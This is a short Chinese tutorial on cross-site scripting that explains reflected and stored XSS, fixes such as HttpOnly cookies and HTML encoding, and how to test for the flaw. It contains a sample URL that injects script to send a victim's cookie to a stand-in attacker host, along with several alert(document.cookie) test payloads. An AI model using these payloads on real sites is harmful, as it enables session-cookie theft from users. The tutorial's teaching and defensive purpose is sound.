XSS 攻击场景
  1. Dom-Based XSS 漏洞 攻击过程如下
  Tom 发现了Victim.com中的一个页面有XSS漏洞,
  例如: http://victim.com/search.asp?term=apple
  服务器中Search.asp 页面的代码大概如下
<html>
<title></title>
<body>
Results  for  <%Reequest.QueryString("term")%>
...
</body>
</html>
  Tom 先建立一个网站http://badguy.com,  用来接收“偷”来的信息。
  然后Tom 构造一个恶意的url(如下), 通过某种方式(邮件,QQ)发给Monica
  http://victim.com/search.asp?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>
  Monica点击了这个URL, 嵌入在URL中的恶意Javascript代码会在Monica的浏览器中执行. 那么Monica在victim.com网站的cookie, 会被发送到badguy网站中。这样Monica在victim.com 的信息被Tom盗了.
  2. Stored XSS(存储式XSS漏洞), 该类型是应用广泛而且有可能影响大Web服务器自身安全的漏洞,攻击者将攻击脚本上传到Web服务器上,使得所有访问该页面的用户都面临信息泄露的可能。 攻击过程如下
  Alex发现了网站A上有一个XSS 漏洞,该漏洞允许将攻击代码保存在数据库中,
  Alex发布了一篇文章,文章中嵌入了恶意JavaScript代码。
  其他人如Monica访问这片文章的时候,嵌入在文章中的恶意Javascript代码会在Monica的浏览器中执行,其会话cookie或者其他信息将被Alex盗走。
  Dom-Based XSS漏洞威胁用户个体,而存储式XSS漏洞所威胁的对象将是大量的用户.
  XSS 漏洞修复
  原则: 不相信客户输入的数据
  注意:  攻击代码不一定在<script></script>中
  将重要的cookie标记为http only,   这样的话Javascript 中的document.cookie语句不能获取到cookie了.
  只允许用户输入我们期望的数据。 例如: 年龄的textbox中,只允许用户输入数字。 而数字之外的字符都过滤掉。
  对数据进行Html Encode 处理
  过滤或移除特殊的Html标签, 例如: <script>, <iframe> ,  &lt; for <, &gt; for >, &quot for
  过滤JavaScript 事件的标签。例如 "onclick=", "onfocus" 等等。
  如何测试XSS漏洞
  方法一:  查看代码,查找关键的变量,   客户端将数据传送给Web 服务端一般通过三种方式 Querystring, Form表单,以及cookie.  例如在ASP的程序中,通过Request对象获取客户端的变量
<%
strUserCode =  Request.QueryString(“code”);
strUser =  Request.Form(“USER”);
strID =    Request.Cookies(“ID”);
%>
  假如变量没有经过htmlEncode处理, 那么这个变量存在一个XSS漏洞
  方法二: 准备测试脚本,
"/><script>alert(document.cookie)</script><!--
<script>alert(document.cookie)</script><!--
"onclick="alert(document.cookie)